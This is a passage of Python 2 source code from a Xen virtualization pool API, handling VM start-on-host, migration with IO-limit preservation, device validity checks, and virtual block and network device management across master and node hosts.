log.debug("in VM_start_on: %s" % vm_ref)
if BNPoolAPI._isMaster:
if self.VM_get_is_local_vm(session, vm_ref).get('Value'):
return self.VM_start(session, vm_ref, start_paused, force_start)
xennode = XendNode.instance()
master_uuid = xennode.uuid
h_ref = BNPoolAPI.get_host_by_vm(vm_ref)
h_ip = BNPoolAPI.get_host_ip(h_ref)
log.debug(h_ip)
host_ip = BNPoolAPI.get_host_ip(host_ref)
paths = xennode.get_ha_sr_location()
log.debug(paths)
# if cmp(paths, {}) !=0:
if paths:
for p in paths.values():
# path = os.path.join(p, CACHED_CONFIG_FILE)
path = os.path.join(p, '%s.sxp' % vm_ref)
break
else:
path = ''
log.debug('vm_start_on ha path: %s' % path)
# else:
# return xen_api_error(['nfs_ha not mounted', NFS_HA_DEFAULT_PATH])
#copy sxp file to nfs
xen_rpc_call(h_ip, 'VM_copy_sxp_to_nfs', vm_ref, path)
if cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) == 0:
log.debug("-----condition 1-----")
log.debug("vm dest: master, vm now: master")
response = self._VM_start(session, vm_ref, start_paused, force_start)
elif cmp(host_ref, master_uuid) == 0 and cmp(master_uuid, h_ref) != 0:
log.debug("-----condition 2-----")
log.debug("vm dest: master, vm now: node")
response = self.VM_create_from_sxp(session, path, True, False)
if cmp (response.get('Status'), 'Success') == 0:
xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) == 0:
log.debug("-----condition 3-----")
log.debug("vm dest: node, vm now: master")
response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, True, False)
if cmp (response.get('Status'), 'Success') == 0:
self._VM_destroy(session, vm_ref, False, False)
elif cmp(host_ref, master_uuid) != 0 and cmp(master_uuid, h_ref) != 0:
if cmp(h_ref, host_ref) == 0:
log.debug("-----condition 4-----")
log.debug("vm dest: node1, vm now: node2, node1 = node2")
response = self.VM_start(session, vm_ref, start_paused, force_start)
else:
log.debug("-----condition 5-----")
log.debug("vm dest: node1, vm now: node2, node1 != node2")
response = xen_rpc_call(host_ip, 'VM_create_from_sxp', path, True, False)
if cmp (response.get('Status'), 'Success') == 0:
xen_rpc_call(h_ip, 'VM_destroy', vm_ref, False, False, False)
if cmp (response.get('Status'), 'Success') == 0:
BNPoolAPI.update_data_struct('vm_start_on', vm_ref, h_ref, host_ref)
log.debug("Finished start on: %s migrate vm(%s) to %s" % (h_ip, vm_ref, host_ip))
return response
else:
path = ''
return self.VM_start(session, vm_ref, start_paused, force_start)
except Exception, exn:
log.exception(exn)
return xen_api_error(['START_ON_FAILED,', exn])
finally:
if path:
cmd = 'rm -f %s' % path
doexec(cmd)
def VM_copy_sxp_to_nfs(self, session, vm_ref, path):
'''
@author: wuyuewen
@summary: Internal method. Copy sxp to HA dir.
'''
XendDomain.instance().copy_sxp_to_ha(vm_ref, path)
return xen_api_success_void()
def VM_suspend(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_suspend(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_suspend', vm_ref)
else:
return self._VM_suspend(session, vm_ref)
def _VM_suspend(self, session, vm_ref):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_suspend", vm_ref)
def VM_unpause(self, session, vm_ref):
'''
@deprecated: not used
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_unpause(session, vm_ref)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VM_unpause', vm_ref)
else:
return self._VM_unpause(session, vm_ref)
def _VM_unpause(self, session, vm_ref):
'''
@deprecated: not used
'''
return XendTask.log_progress(0, 100, do_vm_func,
"domain_unpause", vm_ref)
def VM_send_sysrq(self, _, vm_ref, req):
'''
@deprecated: not used
'''
xeninfo = XendDomain.instance().get_vm_by_uuid(vm_ref)
if xeninfo.state == XEN_API_VM_POWER_STATE_RUNNING \
or xeninfo.state == XEN_API_VM_POWER_STATE_PAUSED:
xeninfo.send_sysrq(req)
return xen_api_success_void()
else:
return xen_api_error(
['VM_BAD_POWER_STATE', vm_ref,
XendDomain.POWER_STATE_NAMES[XEN_API_VM_POWER_STATE_RUNNING],
XendDomain.POWER_STATE_NAMES[xeninfo.state]])
def VM_send_trigger(self, _, vm_ref, trigger, vcpu):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
xendom.domain_send_trigger(xeninfo.getDomid(), trigger, vcpu)
return xen_api_success_void()
def VM_migrate(self, session, vm_ref, destination_url, live, other_config):
'''
@deprecated: not used
'''
return self._VM_migrate(session, vm_ref, destination_url, live, other_config)
def _VM_migrate(self, session, vm_ref, destination_url, live, other_config):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_pool_migrate
'''
self._VM_clean_IO_limit_shutdown(session, vm_ref) #add by wufan
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
port = other_config.get("port", 0)
node = other_config.get("node", -1)
ssl = other_config.get("ssl", None)
chs = other_config.get("change_home_server", False)
xendom.domain_migrate(xeninfo.getDomid(), destination_url,
bool(live), port, node, ssl, bool(chs))
#log.debug('migrate')
# set all tag
#self.VM_set_all_tag(session, vm_ref)
return xen_api_success_void()
def VM_pool_migrate(self, session, vm_ref, dst_host_ref, other_config):
'''
@author: wuyuewen
@summary: Migrate specified VM to specified Host. IO limit settings must be read
before migration and set back afterwards.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param dst_host_ref: destination Host's uuid
@param other_config: useless
@return: True | False
@rtype: dict.
'''
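# io_limit_list collected below has the shape (values hypothetical):
#   {'read_MBps': ..., 'read_iops': ..., 'write_MBps': ..., 'write_iops': ...}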
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
host_ip = BNPoolAPI.get_host_ip(host_ref)
dst_host_ip = BNPoolAPI.get_host_ip(dst_host_ref)
tag_list = self.VM_get_all_tag(session, vm_ref, 'tag').get('Value')
rate_list = self.VM_get_all_tag(session, vm_ref, 'rate').get('Value')
burst_list = self.VM_get_all_tag(session, vm_ref, 'burst').get('Value')
io_limit_list = {}
for type in ['read', 'write']:
for io_unit in ['MBps', 'iops']:
key = "%s_%s" % (type, io_unit)
io_limit_list[key] = self.VM_get_IO_rate_limit(session, vm_ref, type, io_unit).get('Value')
if cmp(host_ref, XendNode.instance().uuid) == 0:
self._VM_migrate(session, vm_ref, dst_host_ip, True, other_config)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
xen_rpc_call(host_ip, "VM_migrate", vm_ref, dst_host_ip, True, other_config)
log.debug("Migrate VM from host: %s" % host_ip)
log.debug("Migrate VM to host: %s" % dst_host_ip)
BNPoolAPI.update_data_struct("vm_migrate", vm_ref, host_ref, dst_host_ref)
self.VM_set_all_tag(session, vm_ref, tag_list)
self.VM_set_all_rate(session, vm_ref, 'rate', rate_list)
self.VM_set_all_rate(session, vm_ref, 'burst', burst_list)
self.VM_start_set_IO_limit(session, vm_ref, io_limit_list)
return xen_api_success_void()
def VM_save(self, _, vm_ref, dest, checkpoint):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
xendom.domain_save(xeninfo.getDomid(), dest, checkpoint)
return xen_api_success_void()
def VM_restore(self, _, src, paused):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xendom.domain_restore(src, bool(paused))
return xen_api_success_void()
def VM_check_usb_scsi_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check usb scsi validity.
'''
return self._VM_check_usb_scsi_valid(session, vm_ref)
def _VM_check_usb_scsi_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check usb scsi validity.
'''
log.debug('VM_check_usb_scsi_valid')
crush_vm = None
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
#get local fiber uuid of the to_started vm
loc_fiber_unames = []
loc_fiber_uuids= self._VM_get_usb_scsi(session, vm_ref).get('Value')
# get local fiber uname of the to_started vm
for loc_fiber_uuid in loc_fiber_uuids:
dev_type, dev_config = dominfo.info['devices'].get(loc_fiber_uuid, (None, None))
if dev_config:
loc_fiber_uname = dev_config.get('uname')
if loc_fiber_uname:
loc_fiber_unames.append(loc_fiber_uname)
if loc_fiber_unames:
running_vms = xd.get_running_vms()
for vm in running_vms:
#if vm.info.get('domid') == dominfo.info.get('domid'):
#log.debug('check dom itself %s' % vm.info.get('domid'))
#continue
device_struct = vm.info['devices']
for uuid, config in device_struct.items():
if config[1].get('uname') in loc_fiber_unames:
vm_name = vm.info['name_label']
crush_vm = vm_name
return xen_api_success(crush_vm)
return xen_api_success(crush_vm)
def VM_check_fibers_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check fibers validity.
'''
return self._VM_check_fibers_valid(session, vm_ref)
#add by wufan
def _VM_check_fibers_valid(self, session, vm_ref):
'''
@author: wuyuewen
@summary: Internal method. Check fibers validity.
'''
log.debug('VM_check_fibers_valid')
crush_vm = None
xd = XendDomain.instance()
dominfo = xd.get_vm_by_uuid(vm_ref)
#get local fiber uuid of the to_started vm
loc_fiber_unames = []
loc_fiber_uuids= self._VM_get_fibers(session, vm_ref).get('Value')
# get local fiber uname of the to_started vm
for loc_fiber_uuid in loc_fiber_uuids:
dev_type, dev_config = dominfo.info['devices'].get(loc_fiber_uuid, (None, None))
if dev_config:
loc_fiber_uname = dev_config.get('uname')
if loc_fiber_uname:
loc_fiber_unames.append(loc_fiber_uname)
if loc_fiber_unames:
running_vms = xd.get_running_vms()
for vm in running_vms:
#if vm.info.get('domid') == dominfo.info.get('domid'):
#log.debug('check dom itself %s' % vm.info.get('domid'))
#continue
device_struct = vm.info['devices']
for uuid, config in device_struct.items():
if config[1].get('uname') in loc_fiber_unames:
vm_name = vm.info['name_label']
crush_vm = vm_name
return xen_api_success(crush_vm)
return xen_api_success(crush_vm)
def VM_cpu_pool_migrate(self, session, vm_ref, cpu_pool_ref):
'''
@deprecated: not used
'''
xendom = XendDomain.instance()
xeninfo = xendom.get_vm_by_uuid(vm_ref)
domid = xeninfo.getDomid()
pool = XendAPIStore.get(cpu_pool_ref, XendCPUPool.getClass())
if pool is None:
return xen_api_error(['HANDLE_INVALID', 'cpu_pool', cpu_pool_ref])
if domid is not None:
if domid == 0:
return xen_api_error(['OPERATION_NOT_ALLOWED',
'could not move Domain-0'])
try:
XendCPUPool.move_domain(cpu_pool_ref, domid)
except Exception, ex:
return xen_api_error(['INTERNAL_ERROR',
'could not move domain'])
self.VM_set('pool_name', session, vm_ref, pool.get_name_label())
return xen_api_success_void()
def VM_create_data_VBD(self, session, vm_ref, vdi_ref, read_only=False):
'''
@author: wuyuewen
@summary: VM create data VBD and VDI.
@precondition: At most 8 data VBDs.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vdi_ref: new VDI's uuid
@return: True | False
@rtype: dict.
'''
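# Hedged usage sketch (uuids hypothetical):
#   self.VM_create_data_VBD(session, '<vm-uuid>', '<vdi-uuid>', read_only=False)
# creates a non-bootable 'Disk' VBD in 'RW' (or 'R') mode via _VBD_create.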
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_create_data_VBD(session, vm_ref, vdi_ref, read_only)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_create_data_VBD', vm_ref, vdi_ref, read_only)
else:
return self._VM_create_data_VBD(session, vm_ref, vdi_ref, read_only)
def _VM_create_data_VBD(self, session, vm_ref, vdi_ref, read_only):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_create_data_VBD
'''
log.debug("=====VM_create_data_VBD=====")
if not read_only:
vbd_struct = {'VM' : vm_ref,
'VDI' : vdi_ref,
'bootable' : False,
# 'device' : self._VM_get_available_vbd_device(session, vm_ref, 'xvd').get('Value', ''),
'mode' : 'RW',
'type' : 'Disk',
}
else:
vbd_struct = {'VM' : vm_ref,
'VDI' : vdi_ref,
'bootable' : False,
# 'device' : self._VM_get_available_vbd_device(session, vm_ref, 'xvd').get('Value', ''),
'mode' : 'R',
'type' : 'Disk',
}
response = self._VBD_create(session, vbd_struct)
if cmp(response.get('Status'), 'Success') == 0:
return xen_api_success(True)
else:
return xen_api_success(False)
def VM_delete_data_VBD(self, session, vm_ref, vdi_ref):
'''
@author: wuyuewen
@summary: VM delete data VBD and VDI.
@param session: session of RPC.
@param vm_ref: VM's uuid
@param vdi_ref: new VDI's uuid
@return: True | False
@rtype: dict.
'''
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VM_delete_data_VBD(session, vm_ref, vdi_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, 'VM_delete_data_VBD', vm_ref, vdi_ref)
else:
return self._VM_delete_data_VBD(session, vm_ref, vdi_ref)
def _VM_delete_data_VBD(self, session, vm_ref, vdi_ref):
'''
@author: wuyuewen
@summary: Internal method.
@see: VM_delete_data_VBD
'''
self.__vbd_lock__.acquire()
try:
log.debug("=====VM_delete_data_VBD=====")
log.debug('VDI ref: %s' % vdi_ref)
vdi = XendNode.instance().get_vdi_by_uuid(vdi_ref)
vbd = []
vbd_ref = ""
if vdi:
log.debug('get VBDs by VDI:')
vbd = vdi.getVBDs()
log.debug(vbd)
else:
return xen_api_success(False)
if vbd and isinstance(vbd, list):
vbd_ref = vbd[0]
else:
return xen_api_success(False)
log.debug("vbd ref: %s" % vbd_ref)
response = self.VBD_destroy(session, vbd_ref)
if cmp(response.get('Status'), 'Success') == 0:
return xen_api_success(True)
else:
return xen_api_success(False)
except Exception, exn:
log.exception(exn)
return xen_api_success(False)
finally:
self.__vbd_lock__.release()
# Xen API: Class VBD
# ----------------------------------------------------------------
VBD_attr_ro = ['VM',
'VDI',
'metrics',
'runtime_properties',
'io_read_kbs',
'io_write_kbs']
VBD_attr_rw = ['device',
'bootable',
'mode',
'type']
VBD_attr_inst = VBD_attr_rw
VBD_methods = [('media_change', None), ('destroy', None), ('destroy_on', None)]
VBD_funcs = [('create', 'VBD'),
('create_on', 'VBD')]
# object methods
def VBD_get_record(self, session, vbd_ref):
storage = self._get_BNStorageAPI_instance()
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
cfg = vm.get_dev_xenapi_config('vbd', vbd_ref)
if not cfg:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
valid_vbd_keys = self.VBD_attr_ro + self.VBD_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
return_cfg = {}
for k in cfg.keys():
if k in valid_vbd_keys:
return_cfg[k] = cfg[k]
return_cfg['metrics'] = vbd_ref
return_cfg['runtime_properties'] = {} #todo
return_cfg['io_read_kbs'] = vm.get_dev_property('vbd', vbd_ref, 'io_read_kbs')
return_cfg['io_write_kbs'] = vm.get_dev_property('vbd', vbd_ref, 'io_write_kbs')
if return_cfg.has_key('VDI') and return_cfg.get('VDI'):
location = storage.VDI_get_location(session, return_cfg.get('VDI')).get('Value')
if location:
return_cfg['userdevice'] = location
# log.debug(return_cfg)
return xen_api_success(return_cfg)
def VBD_media_change(self, session, vbd_ref, new_vdi_ref):
xendom = XendDomain.instance()
xennode = XendNode.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
cur_vbd_struct = vm.get_dev_xenapi_config('vbd', vbd_ref)
if not cur_vbd_struct:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['type'] != XEN_API_VBD_TYPE[0]: # Not CD
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
if cur_vbd_struct['mode'] != 'RO': # Not read only
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
new_vdi = xennode.get_vdi_by_uuid(new_vdi_ref)
if not new_vdi:
return xen_api_error(['HANDLE_INVALID', 'VDI', new_vdi_ref])
new_vdi_image = new_vdi.get_location()
valid_vbd_keys = self.VBD_attr_ro + self.VBD_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
new_vbd_struct = {}
for k in cur_vbd_struct.keys():
if k in valid_vbd_keys:
new_vbd_struct[k] = cur_vbd_struct[k]
new_vbd_struct['VDI'] = new_vdi_ref
try:
XendTask.log_progress(0, 100,
vm.change_vdi_of_vbd,
new_vbd_struct, new_vdi_image)
except XendError, e:
log.exception("Error in VBD_media_change")
return xen_api_error(['INTERNAL_ERROR', str(e)])
return xen_api_success_void()
# class methods
def VBD_create_on(self, session, vbd_struct, host_ref):
storage = self._get_BNStorageAPI_instance()
# log.debug(vbd_struct)
if BNPoolAPI._isMaster:
vbd_type = vbd_struct.get('type')
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VBD_create(session, vbd_struct)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
if cmp(vbd_type, XEN_API_VBD_TYPE[0]) == 0:
vdi = vbd_struct.get('VDI')
if vdi:
log.debug(storage.VDI_get_name_label(session, vdi))
vdi_name = storage.VDI_get_name_label(session, vdi).get('Value')
if vdi_name:
remote_vdi = xen_rpc_call(remote_ip, 'VDI_get_by_name_label', vdi_name).get('Value')
if remote_vdi:
vbd_struct['VDI'] = remote_vdi
else:
                                return xen_api_error(['%s VDI %s not found!' % (remote_ip, vdi_name)])
                        else:
                            return xen_api_error(['Invalid VDI %s' % vdi])
                    else:
                        return xen_api_error(['VBD struct error: VDI not defined.'])
return xen_rpc_call(remote_ip, 'VBD_create', vbd_struct)
else:
return self.VBD_create(session, vbd_struct)
def VBD_create(self, session, vbd_struct):
vm_ref = vbd_struct.get('VM')
if not vm_ref:
return xen_api_error(['VM_NOT_FOUND'])
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VBD_create(session, vbd_struct)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VBD_create', vbd_struct)
else:
return self._VBD_create(session, vbd_struct)
def _VBD_create(self, session, vbd_struct):
xendom = XendDomain.instance()
xennode = XendNode.instance()
if not xendom.is_valid_vm(vbd_struct['VM']):
return xen_api_error(['VM_NOT_FOUND', 'VM', vbd_struct['VM']])
dom = xendom.get_vm_by_uuid(vbd_struct['VM'])
vdi = xennode.get_vdi_by_uuid(vbd_struct['VDI'])
if not vdi:
return xen_api_error(['HANDLE_INVALID', 'VDI', vbd_struct['VDI']])
# new VBD via VDI/SR
vdi_image = vdi.get_location()
log.debug("vdi location: %s" % vdi_image)
try:
vbd_ref = XendTask.log_progress(0, 100,
dom.create_vbd_for_xenapi,
vbd_struct, vdi_image)
log.debug('VBD_create %s' % vbd_ref)
except XendError, e:
log.exception("Error in VBD_create")
return xen_api_error(['INTERNAL_ERROR', str(e)])
xendom.managed_config_save(dom)
return xen_api_success(vbd_ref)
def VBD_destroy(self, session, vbd_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD', vbd_ref])
# vdi_ref = XendDomain.instance()\
# .get_dev_property_by_uuid('vbd', vbd_ref, "VDI")
# vdi = XendNode.instance().get_vdi_by_uuid(vdi_ref)
XendTask.log_progress(0, 100, vm.destroy_vbd, vbd_ref)
xendom.managed_config_save(vm)
return xen_api_success_void()
def VBD_destroy_on(self, session, vbd_ref, host_ref):
if BNPoolAPI._isMaster:
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VBD_destroy(session, vbd_ref)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(remote_ip, "VBD_destroy", vbd_ref)
else:
return self.VBD_destroy(session, vbd_ref)
def _VBD_get(self, vbd_ref, prop):
return xen_api_success(
XendDomain.instance().get_dev_property_by_uuid(
'vbd', vbd_ref, prop))
# attributes (ro)
def VBD_get_metrics(self, _, vbd_ref):
return xen_api_success(vbd_ref)
def VBD_get_runtime_properties(self, _, vbd_ref):
xendom = XendDomain.instance()
dominfo = xendom.get_vm_with_dev_uuid('vbd', vbd_ref)
device = dominfo.get_dev_config_by_uuid('vbd', vbd_ref)
try:
devid = int(device['id'])
device_sxps = dominfo.getDeviceSxprs('vbd')
device_dicts = [dict(device_sxp[1][0:]) for device_sxp in device_sxps]
device_dict = [device_dict
for device_dict in device_dicts
if int(device_dict['virtual-device']) == devid][0]
return xen_api_success(device_dict)
except Exception, exn:
log.exception(exn)
return xen_api_success({})
# attributes (rw)
def VBD_get_VM(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'VM')
def VBD_get_VDI(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'VDI')
def VBD_get_device(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'device')
def VBD_get_bootable(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'bootable')
def VBD_get_mode(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'mode')
def VBD_get_type(self, session, vbd_ref):
return self._VBD_get(vbd_ref, 'type')
def VBD_set_bootable(self, session, vbd_ref, bootable):
bootable = bool(bootable)
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('vbd', vbd_ref)
vm.set_dev_property('vbd', vbd_ref, 'bootable', int(bootable))
xd.managed_config_save(vm)
return xen_api_success_void()
def VBD_set_mode(self, session, vbd_ref, mode):
if mode == 'RW':
mode = 'w'
else:
mode = 'r'
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('vbd', vbd_ref)
vm.set_dev_property('vbd', vbd_ref, 'mode', mode)
xd.managed_config_save(vm)
return xen_api_success_void()
def VBD_set_VDI(self, session, vbd_ref, VDI):
xd = XendDomain.instance()
vm = xd.get_vm_with_dev_uuid('vbd', vbd_ref)
vm.set_dev_property('vbd', vbd_ref, 'VDI', VDI)
xd.managed_config_save(vm)
return xen_api_success_void()
def VBD_get_all(self, session):
xendom = XendDomain.instance()
vbds = [d.get_vbds() for d in XendDomain.instance().list('all')]
        vbds = reduce(lambda x, y: x + y, vbds, [])
return xen_api_success(vbds)
# Xen API: Class VBD_metrics
# ----------------------------------------------------------------
VBD_metrics_attr_ro = ['io_read_kbs',
'io_write_kbs',
'last_updated']
VBD_metrics_attr_rw = []
VBD_metrics_methods = []
def VBD_metrics_get_all(self, session):
return self.VBD_get_all(session)
def VBD_metrics_get_record(self, _, ref):
vm = XendDomain.instance().get_vm_with_dev_uuid('vbd', ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VBD_metrics', ref])
return xen_api_success(
{ 'io_read_kbs' : vm.get_dev_property('vbd', ref, 'io_read_kbs'),
'io_write_kbs' : vm.get_dev_property('vbd', ref, 'io_write_kbs'),
'last_updated' : now()
})
def VBD_metrics_get_io_read_kbs(self, _, ref):
return self._VBD_get(ref, 'io_read_kbs')
def VBD_metrics_get_io_write_kbs(self, session, ref):
return self._VBD_get(ref, 'io_write_kbs')
def VBD_metrics_get_last_updated(self, _1, _2):
return xen_api_success(now())
# Xen API: Class VIF
# ----------------------------------------------------------------
VIF_attr_ro = ['network',
'VM',
'metrics',
'runtime_properties']
VIF_attr_rw = ['device',
'MAC',
'MTU',
'security_label',
'physical_network',
'physical_network_local',
]
VIF_attr_inst = VIF_attr_rw
VIF_methods = [('destroy', None)]
VIF_funcs = [('create', 'VIF'),
('create_on', 'VIF'),
('create_bind_to_physical_network', None)
]
# object methods
def VIF_get_record(self, session, vif_ref):
xendom = XendDomain.instance()
vm = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not vm:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
cfg = vm.get_dev_xenapi_config('vif', vif_ref)
if not cfg:
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
valid_vif_keys = self.VIF_attr_ro + self.VIF_attr_rw + \
self.Base_attr_ro + self.Base_attr_rw
return_cfg = {}
for k in cfg.keys():
if k in valid_vif_keys:
return_cfg[k] = cfg[k]
return_cfg['metrics'] = vif_ref
return xen_api_success(return_cfg)
# class methods
def VIF_create_on(self, session, vif_struct, host_ref):
if BNPoolAPI._isMaster:
network = vif_struct.get('network')
log.debug("get network from rec: %s", network)
#if network:
# log.debug(xenapi.network_get_name_label(session, network))
# network_label = xenapi.network_get_name_label(session, network).get('Value')
# # log.debug(network_label)
#else:
# vif_struct['network'] = 'ovs0'
# log.debug("get from network : %s" % vif_struct.get('network'))
# #return xen_api_error(['network not found'])
if not network or cmp(network, 'OpaqueRef:NULL') == 0:
vif_struct['network'] = 'ovs1'
log.debug("get from network : %s" % vif_struct.get('network'))
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VIF_create(session, vif_struct)
else:
remote_ip = BNPoolAPI.get_host_ip(host_ref)
#remote_network = xen_rpc_call(remote_ip, 'network_get_by_name_label', network_label).get('Value')
#if remote_network:
# log.debug(remote_network[0])
# vif_struct['network'] = remote_network[0]
#else:
# return xen_api_error(['%s network not found!' % remote_ip, 'Network'])
return xen_rpc_call(remote_ip, 'VIF_create', vif_struct)
else:
network = vif_struct.get('network')
log.debug("get network from rec: %s", network)
if not network or cmp(network, 'OpaqueRef:NULL') == 0:
vif_struct['network'] = 'ovs1'
log.debug("get from network : %s" % vif_struct.get('network'))
return self.VIF_create(session, vif_struct)
def VIF_create_bind_to_physical_network(self, session, vif_struct, phy_network):
if BNPoolAPI._isMaster:
vm_ref = vif_struct.get('VM', '')
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self._VIF_create_bind_to_physical_network(session, vif_struct, phy_network)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VIF_create_bind_to_physical_network', vif_struct, phy_network)
else:
return self._VIF_create_bind_to_physical_network(session, vif_struct, phy_network)
def _VIF_create_bind_to_physical_network(self, session, vif_struct, phy_network):
vm_ref = vif_struct.get('VM', '')
vifs = self._VM_get_VIFs(session, vm_ref).get('Value')
if vifs:
if cmp(len(vifs), INTERFACE_LIMIT) >= 0:
return xen_api_error(['DEVICE_OUT_OF_RANGE', 'VIF'])
xenapi = self._get_XendAPI_instance()
log.debug('VIF create bind to physical network')
network_refs = xenapi.network_get_all(session).get('Value')
network_names = []
for ref in network_refs:
namelabel = xenapi.network_get_name_label(session, ref).get('Value')
network_names.append(namelabel)
# log.debug(network_names)
if phy_network not in network_names:
            return xen_api_error(['Network name does not exist!'] + network_names)
vif_struct['network'] = phy_network
log.debug("get from network : %s" % vif_struct.get('network'))
return self._VIF_create(session, vif_struct)
'''
set physical network for vm, pass the refer
'''
def VIF_set_physical_network(self, session, vif_ref, vm_ref, phy_network):
log.debug('VIF(%s)_set_physical_network on vm(%s)' % (vif_ref, vm_ref))
if BNPoolAPI._isMaster:
host_ref = BNPoolAPI.get_host_by_vm(vm_ref)
if cmp(host_ref, XendNode.instance().uuid) == 0:
return self.VIF_set_physical_network_local(session, vif_ref, vm_ref, phy_network)
else:
host_ip = BNPoolAPI.get_host_ip(host_ref)
return xen_rpc_call(host_ip, 'VIF_set_physical_network', vif_ref, vm_ref, phy_network)
else:
return self.VIF_set_physical_network_local(session, vif_ref, vm_ref, phy_network)
def VIF_set_physical_network_local(self, session, vif_ref, vm_ref, phy_network):
xenapi = self._get_XendAPI_instance()
log.debug('local method VIF(%s)_set_physical_network on vm(%s)' % (vif_ref, vm_ref))
network_refs = xenapi.network_get_all(session).get('Value')
network_names = {}
for ref in network_refs:
namelabel = xenapi.network_get_name_label(session, ref).get('Value')
network_names[namelabel] = ref
log.debug(network_names)
if phy_network not in network_names:
            return xen_api_error(['Network name does not exist!'] + network_names.keys())
xendom = XendDomain.instance()
dom = xendom.get_vm_with_dev_uuid('vif', vif_ref)
if not dom:
log.debug('vif cannot be found on vm!')
return xen_api_error(['HANDLE_INVALID', 'VIF', vif_ref])
# if dom._stateGet() == XEN_API_VM_POWER_STATE_RUNNING:
# log.debug('VM(%s) is running!' % vm_ref)
# return xen_api_error(['VM is running!'])
try:
origin_network = self.VIF_get_network(session, vif_ref).get('Value')
except:
log.exception("VIF did not have Network field.")
origin_network = None
new_network = network_names[phy_network]
origin_bridge = self._VIF_get(vif_ref, 'bridge').get('Value')
# origin_bridge = xenapi.network_get_name_label(session, origin_network).get('Value')
new_bridge = phy_network
# log.debug('origin_network: %s and new_network: %s' % (origin_network, new_network))
# log.debug('origin_bridge: %s and new_bridge: %s' % (origin_bridge, new_bridge))
#must set both network and bridge, or set bridge only,
#do not set network only, set network only won't work
rc = True
rc1 = True
if origin_network and cmp(origin_network, new_network) != 0 :
rc = self._VIF_set(vif_ref, 'network', new_network, origin_network)
if cmp(origin_bridge, new_bridge) != 0:
rc1 = self._VIF_set(vif_ref, 'bridge', new_bridge, origin_bridge)
if rc == False or rc1 == False:
log.error('set vif physical network failed')
return xen_api_error(['set vif physical network failed'])
return xen_api_success_void()
def VIF_create(self, session, vif_struct):
vm_ref = vif_struct.get('VM')
if not vm_ref:
return xen_api_error(['VM_NOT_FOUND'])
